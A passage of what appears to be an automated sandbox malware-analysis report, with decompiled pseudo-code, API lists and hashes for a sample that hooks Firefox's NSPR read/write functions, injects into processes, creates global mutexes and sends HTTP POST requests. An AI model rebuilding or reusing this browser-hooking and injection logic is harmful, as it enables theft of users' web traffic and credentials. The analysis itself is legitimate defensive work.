0x0041414a
0x004142e2
0x004142e6
0x004142eb
0x004142eb
0x004142ed
0x004142f3
0x004142f3
0x00414155
0x0041415a
0x0041416c
0x0041416f
0x00414172
0x004141af
0x004141af
0x004141b4
0x004141bb
0x004141c5
0x004141ca
0x004141ca
0x004141d4
0x004141d8
0x004141dc
0x004141e4
0x004141e6
0x004141e8
0x004141ec
0x004141ec
0x004141f0
0x004141f4
0x004141f6
0x004141f8
0x004141fc
0x004141fc
0x004141fc
0x00414200
0x00414200
0x00414210
0x00414216
0x00414218
0x004142be
0x004142c2
0x004142d7
0x004142e0
0x00000000
0x0041421e
0x0041421e
0x00414224
0x00414224
0x00414228
0x00000000
0x00000000
0x0041422e
0x00414232
0x00414236
0x0041423e
0x00414242
0x00414296
0x00414296
0x00414298
0x0041429c
0x0041429e
0x004142a0
0x004142a3
0x00000000
0x00000000
0x00414251
0x0041426d
0x00414271
0x00414278
0x00414288
0x0041428d
0x0041428f
0x00414291
0x00414291
0x0041428f
0x004142b0
0x004142b6
0x004142b8
0x00000000
0x00000000
0x00000000
0x004142b8
0x00414244
0x00414248
0x00414248
0x00000000
0x00414248
0x00414238
0x00000000
0x00414238
0x00000000
0x00414224
0x00000000
0x00000000
0x00000000
0x00414174
0x00414174
0x0041417f
0x00414185
0x0041418a
0x00000000
0x00000000
0x0041418c
0x0041419e
0x004141a1
0x004141a4
0x00000000
0x00000000
0x00000000
0x004141a4
0x004141a6
0x004141a9
0x00000000
0x00000000
0x00000000
0x004141a9
0x0041413d
0x00000000

APIs

Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041417F
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00414210
#1.WS2_32(?,00000000,00000000), ref: 0041429C
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004142B0
CloseHandle.KERNEL32(?), ref: 004142D1
CloseHandle.KERNEL32(?), ref: 004142E0

Strings

G@A, xrefs: 00414298

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingle
String ID: G@A
API String ID: 2824434197-2067168340
Opcode ID: f5dbe88e84f3c8e65d4e8d8e530743bfc460e87d206bad80218f9e35f92e7227
Instruction ID: 34b6e7a185b37dcbe343efadc8bcb16d97e72c51ad75bb3cb4531f6764a8220d
Opcode Fuzzy Hash: f5dbe88e84f3c8e65d4e8d8e530743bfc460e87d206bad80218f9e35f92e7227
Instruction Fuzzy Hash: C1518B71108300ABC720EF65DC44CAFB7F9EBC5754F200A6EF594A32A0D7349D898B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00412C0F, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412C0F(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x422988);
				 *0x42297c = 0;
				 *0x422984 = 0;
				 *0x422980 = 0;
				 *0x4228ac = 0;
				 *0x423e74 = 0;
				 *0x423e6c = 0;
				 *0x423e70 = 0;
				InitializeCriticalSection(0x423e54);
				_t42 =  &_v532;
				E0041349C(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0041C41E( &_v532);
				E00404F50( &_v532);
				 *0x422464 = 0;
				 *0x422890 = 0;
				InitializeCriticalSection("hx(B");
				E00416B62(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E0041D672(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423dec =  *0x423dec | 0x00000001;
				}
				E0041D43B();
				return 1;
			}

0x00412c0f
0x00412c0f
0x00412c26
0x00412c31
0x00412c37
0x00412c3d
0x00412c43
0x00412c49
0x00412c4f
0x00412c55
0x00412c5b
0x00412c5e
0x00412c64
0x00412c69
0x00412c7c
0x00412c89
0x00412c8e
0x00412ca8
0x00412cad
0x00412cad
0x00412cb1
0x00412cb1
0x00412cb7
0x00412cbd
0x00412cc3
0x00412cc3
0x00412cc9
0x00412cd7
0x00412ce2
0x00412cec
0x00412cf2
0x00412cf8
0x00412cfa
0x00412d0c
0x00412d17
0x00412d0e
0x00412d10
0x00412d10
0x00412d1b
0x00412d1d
0x00412d1d
0x00412d24
0x00412d2f

APIs

InitializeCriticalSection.KERNEL32(00422988,00000000,0001FEBC,00000000), ref: 00412C26
InitializeCriticalSection.KERNEL32(00423E54), ref: 00412C5B

Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00412C83
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412CA0
CloseHandle.KERNEL32(00000000), ref: 00412CB1
InitializeCriticalSection.KERNEL32(hx(B), ref: 00412CF8
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412D04

Strings

hx(B, xrefs: 00412CE7
nspr4.dll, xrefs: 00412CFF

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: hx(B$nspr4.dll
API String ID: 1155594396-2454058360
Opcode ID: 7b63f1a6bc97a99cca4c3181f9fe5fcef7450ce2fcd74b23dd304bbc442dfe18
Instruction ID: af7b45b5f8339cdd774d57de4f5ddb64d0a42b5c6516691ea762e086a4282fad
Opcode Fuzzy Hash: 7b63f1a6bc97a99cca4c3181f9fe5fcef7450ce2fcd74b23dd304bbc442dfe18
Instruction Fuzzy Hash: 5131A770600208AAC710AF79EE85AEE77B8AB04314F50057BE514E32A0D7B84E868F5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B08C, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041B08C(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0041317B(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E004132A1();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E0040F995(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x423d64, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00409CB7(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E00411D2E( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E0040C1C2(_v20);
							E0040C1C2(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E0041AB21(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E0040D092(_t80, 1);
							_v12 = E0040D092(_t80, 2);
							_t39 = E0040D571(_t80, E0040CCFF(_t80));
							_t72 = _v8;
							_t41 = E0040D571(_t72, E0040CCFF(_v8));
							_t70 = _v12;
							_push(E0040D571(_t70, E0040CCFF(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E0040CEB5(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x4238d8, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E0040C192(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E0040F995(_t69);
									goto L20;
								}
								 *_t78 = E0040C620(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E0040C620(_t53 | 0xffffffff, _v8);
								_t57 = E0040C620(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E0040C1C2( *_t78);
									E0040C1C2( *(_t78 + 4));
									E0040C1C2( *(_t78 + 8));
									E0040C1C2(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E0040DBF7(0x80000, E0041ADE1, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E0040D092(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x423d64, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0041b08c
0x0041b08c
0x0041b099
0x0041b09e
0x0041b0a3
0x0041b0b4
0x0041b0ba
0x0041b0bf
0x0041b0c1
0x0041b27f
0x0041b282
0x0041b287
0x00000000
0x0041b287
0x0041b0d2
0x0041b0d8
0x0041b0dd
0x00000000
0x00000000
0x0041b0e6
0x0041b0e6
0x0041b0eb
0x0041b0ee
0x0041b0f0
0x00000000
0x00000000
0x0041b106
0x0041b108
0x0041b10b
0x0041b10d
0x0041b250
0x0041b253
0x0041b25b
0x00000000
0x0041b25b
0x0041b113
0x0041b117
0x0041b11c
0x0041b11e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b124
0x0041b124
0x0041b12d
0x0041b13b
0x0041b145
0x0041b14a
0x0041b156
0x0041b15b
0x0041b16c
0x0041b16d
0x0041b16e
0x0041b16f
0x0041b176
0x0041b177
0x0041b17a
0x0041b17f
0x0041b182
0x0041b185
0x00000000
0x00000000
0x0041b19b
0x0041b19d
0x0041b19f
0x00000000
0x00000000
0x0041b1a5
0x0041b1ab
0x0041b1b0
0x0041b1b3
0x0041b1b9
0x0041b1b9
0x0041b1b9
0x0041b1bb
0x0041b1bd
0x0041b1c1
0x0041b1c7
0x0041b1c9
0x0041b1cb
0x0041b237
0x0041b238
0x00000000
0x0041b238
0x0041b1d9
0x0041b1e6
0x0041b1ec
0x0041b1f1
0x0041b1f4
0x0041b1f7
0x0041b1fa
0x0041b21a
0x0041b21c
0x0041b224
0x0041b22c
0x0041b232
0x00000000
0x0041b232
0x0041b1fc
0x0041b200
0x00000000
0x00000000
0x0041b202
0x0041b204
0x00000000
0x00000000
0x0041b211
0x0041b216
0x0041b218
0x00000000
0x00000000
0x00000000
0x0041b218
0x0041b23d
0x0041b246
0x0041b248
0x0041b248
0x00000000
0x0041b260
0x0041b26b
0x0041b271
0x0041b271
0x00000000
0x0041b27e
0x00000000

APIs

Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C

GetCurrentThread.KERNEL32 ref: 0041B0AD
SetThreadPriority.KERNEL32(00000000), ref: 0041B0B4
WaitForSingleObject.KERNEL32(0000EA60), ref: 0041B0D2
CreateMutexW.KERNEL32(004238D8,00000001,?,20000000), ref: 0041B195
GetLastError.KERNEL32 ref: 0041B1A5
CloseHandle.KERNEL32(00000000), ref: 0041B1B3

Strings

Global\%08X%08X%08X, xrefs: 0041B16F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: 7aafb92fd39b07f2f2a6ed6d36d866ff8bcac64f70d3a7f423c38fc106464d87
Instruction ID: 73d44bdd89965a5a00f4da9d070dfe987f6b8f943b0cdabcfd072f67138e1767
Opcode Fuzzy Hash: 7aafb92fd39b07f2f2a6ed6d36d866ff8bcac64f70d3a7f423c38fc106464d87
Instruction Fuzzy Hash: EA41B471A00701B6DB213BB18D86FAF7665EF04718F10467BF510B92E2CB7C9D85869D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0EF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040B0EF(void* __ecx, signed char __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t44;
				intOrPtr _t46;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr* _t57;
				void* _t59;
				void* _t60;
				intOrPtr* _t61;
				signed char _t62;
				CHAR* _t64;
				CHAR* _t65;
				CHAR* _t66;
				_Unknown_base(*)()* _t67;
				WCHAR* _t69;
				void* _t71;

				_t62 = __edx;
				_t60 = __ecx;
				_t69 =  &_v112;
				E004128DB(0xdd, _t69);
				_t32 = LoadLibraryW(_t69);
				_v8 = _t32;
				if(_t32 != 0) {
					_t64 =  &_v84;
					E004128A5(0xde, _t64);
					_t57 = GetProcAddress(_v8, _t64);
					_t65 =  &_v40;
					E004128A5(0xdf, _t65);
					_v20 = GetProcAddress(_v8, _t65);
					_t66 =  &_v60;
					E004128A5(0xe0, _t66);
					_t44 = GetProcAddress(_v8, _t66);
					_t71 = 0;
					_t67 = _t44;
					if(_t57 == 0 || _v20 == 0 || _t67 == 0) {
						L15:
						return FreeLibrary(_v8);
					} else {
						_t46 = E0040D88E(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t46;
						if(_t46 != 0xffffffff) {
							E0040B07E(_t60, 0, _t67, _t46, _a4, _a8);
						}
						_push( &_v12);
						_push( &_v16);
						_push(1);
						_push(_t71);
						_push(_t71);
						if( *_t57() == 0) {
							goto L15;
						} else {
							_t59 = 0;
							if(_v12 <= _t71) {
								L14:
								_v20(_v16);
								goto L15;
							} else {
								goto L8;
							}
							do {
								L8:
								_t61 = _t71 + _v16;
								_t52 =  *((intOrPtr*)(_t61 + 8));
								if(_t52 == 0 || _t52 == 4) {
									_t53 =  *_t61;
									if(_t53 == _v24) {
										goto L13;
									}
									_push(_a8);
									_push(_a4);
									 *(_t53 + 0x57) =  *(_t53 + 0x57) | _t62;
									E0040B07E(_t61, _t71);
								}
								L13:
								_t59 = _t59 + 1;
								_t71 = _t71 + 0xc;
							} while (_t59 < _v12);
							goto L14;
						}
					}
				}
				return _t32;
			}

0x0040b0ef
0x0040b0ef
0x0040b0f6
0x0040b0fe
0x0040b106
0x0040b10c
0x0040b111
0x0040b119
0x0040b121
0x0040b134
0x0040b136
0x0040b13e
0x0040b14b
0x0040b14e
0x0040b156
0x0040b161
0x0040b163
0x0040b165
0x0040b169
0x0040b1e7
0x00000000
0x0040b174
0x0040b179
0x0040b17e
0x0040b184
0x0040b18a
0x0040b194
0x0040b194
0x0040b19c
0x0040b1a0
0x0040b1a1
0x0040b1a3
0x0040b1a4
0x0040b1a9
0x00000000
0x0040b1ab
0x0040b1ab
0x0040b1b0
0x0040b1e1
0x0040b1e4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b1b2
0x0040b1b2
0x0040b1b5
0x0040b1b8
0x0040b1bd
0x0040b1c4
0x0040b1c9
0x00000000
0x00000000
0x0040b1cb
0x0040b1ce
0x0040b1d0
0x0040b1d3
0x0040b1d3
0x0040b1d8
0x0040b1d8
0x0040b1d9
0x0040b1dc
0x00000000
0x0040b1b2
0x0040b1a9
0x0040b169
0x0040b1f4

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BA85,?,?), ref: 0040B106
GetProcAddress.KERNEL32(?,?), ref: 0040B132
GetProcAddress.KERNEL32(?,?), ref: 0040B149
GetProcAddress.KERNEL32(?,?), ref: 0040B161
FreeLibrary.KERNEL32(?), ref: 0040B1EA

Part of subcall function 0040D88E: GetCurrentThread.KERNEL32 ref: 0040D89E
Part of subcall function 0040D88E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
Part of subcall function 0040D88E: OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040BA85,?,?,00000000), ref: 0040B17E

Part of subcall function 0040B07E: EqualSid.ADVAPI32(00000000,0000000C,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0A3
Part of subcall function 0040B07E: CloseHandle.KERNEL32(?,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0E4

Strings

.exe, xrefs: 0040B118
SeTcbPrivilege, xrefs: 0040B174

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: f694a39895ab7fc72a6987b5d134fd813fb3493b664ff2da0ac35b8f692b38ab
Instruction ID: c3c360ee8cfc3f6e8bd357538edf8ee73465d159bb468cb467c7c84a551c09b9
Opcode Fuzzy Hash: f694a39895ab7fc72a6987b5d134fd813fb3493b664ff2da0ac35b8f692b38ab
Instruction Fuzzy Hash: 01316A75E00218BBDB11ABA4CC419EEBB79EF44344F144167F811FA290CB799E44DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEAA, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040DEAA(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0,  &E00422388, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x0040deb1
0x0040deb5
0x0040deba
0x0040debc
0x0040debc
0x0040dec5
0x0040dec7
0x0040dec7
0x0040ded0
0x0040ded5
0x0040ded7
0x0040ded7
0x0040def8
0x0040defc
0x0040df5c
0x00000000
0x0040defe
0x0040df00
0x0040df08
0x0040df0a
0x0040df0f
0x0040df02
0x0040df02
0x0040df04
0x0040df21
0x0040df55
0x0040df56
0x00000000
0x0040df23
0x0040df23
0x0040df37
0x0040df46
0x00000000
0x0040df51
0x00000000
0x0040df51
0x0040df46
0x0040df21

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422388,8404F700,00000000), ref: 0040DEF2
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 0040DF19
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0040DF3E
InternetCloseHandle.WININET(00000000), ref: 0040DF56

Strings

HTTP/1.1, xrefs: 0040DEE6
Connection: close, xrefs: 0040DF0A, 0040DF17
POST, xrefs: 0040DED0
GET, xrefs: 0040DED7, 0040DEEE

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 8a2bb9a8b4b0c14ec855e348a02c7b775db599299af397e8d2f36589d023031d
Instruction ID: 19b1cb25b356854eb85ea28bc17723a5f9eeca6665aed3e8c77da6be20528d59
Opcode Fuzzy Hash: 8a2bb9a8b4b0c14ec855e348a02c7b775db599299af397e8d2f36589d023031d
Instruction Fuzzy Hash: 4D118E3161020A6BEB119E90DC45FEB3A98AB14754F108036BF06B92E0DBB9D91887EC

Uniqueness

Uniqueness Score: -1.00%

Function 0041D672, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041D672(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422358 = GetProcAddress(__edi, "PR_Close");
				 *0x422368 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422348);
				_t9 = 4;
				 *0x422378 = _t4;
				_t10 = E0041D3AA(_t9, _t11, _t12);
				if(_t10 != 0) {
					E00405009(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
				}
				return _t10;
			}

0x0041d672
0x0041d672
0x0041d688
0x0041d695
0x0041d6a2
0x0041d6a7
0x0041d6a9
0x0041d6b0
0x0041d6b1
0x0041d6bb
0x0041d6bf
0x0041d6db
0x0041d6db
0x0041d6e4

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0041D680
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0041D68D
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0041D69A
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0041D6A7

Part of subcall function 0041D3AA: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,0001FE38,?,?,0041D670,00422008,00000000,00412D29), ref: 0041D3E1

Part of subcall function 00405009: InitializeCriticalSection.KERNEL32(004223C0,0001FEBC,0041D6E0,00422348), ref: 0040501F
Part of subcall function 00405009: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040505B
Part of subcall function 00405009: GetProcAddress.KERNEL32(PR_SetError), ref: 0040506D
Part of subcall function 00405009: GetProcAddress.KERNEL32(PR_GetError), ref: 0040507F

Strings

PR_Write, xrefs: 0041D69C
PR_OpenTCPSocket, xrefs: 0041D67A
PR_Close, xrefs: 0041D682
PR_Read, xrefs: 0041D68F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 76d6eaa55fd178d4858bc49284eed6c96c74ffaa6bda723e920ede1a6de62429
Instruction ID: 9fc0deac0ac53d3c63d32d0e64b98c87ebb9b667efab483fdc9079f608df1d5c
Opcode Fuzzy Hash: 76d6eaa55fd178d4858bc49284eed6c96c74ffaa6bda723e920ede1a6de62429
Instruction Fuzzy Hash: A3F090B1F803107ACB20AB756D45E663F78B785B603A4003BB904A31B0D2FE4042DA5C

Uniqueness

Uniqueness Score: -1.00%

Function 004057F8, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004057F8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E004132A1();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x4223e4(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x4223c0;
					EnterCriticalSection(0x4223c0);
					_t101 = L00404B96(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x4223dc;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4334512
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E0040C1FE(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E0040C275(E0040C1C2( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x4223c0);
					_t107 =  *0x4223e4(_t179, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x4223c0);
					_t108 = L00404B96(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x4223bc();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x4223dc;
						_v36 = _t176;
						if(_t168 > 0) {
							E0040C1FE( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040541C(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
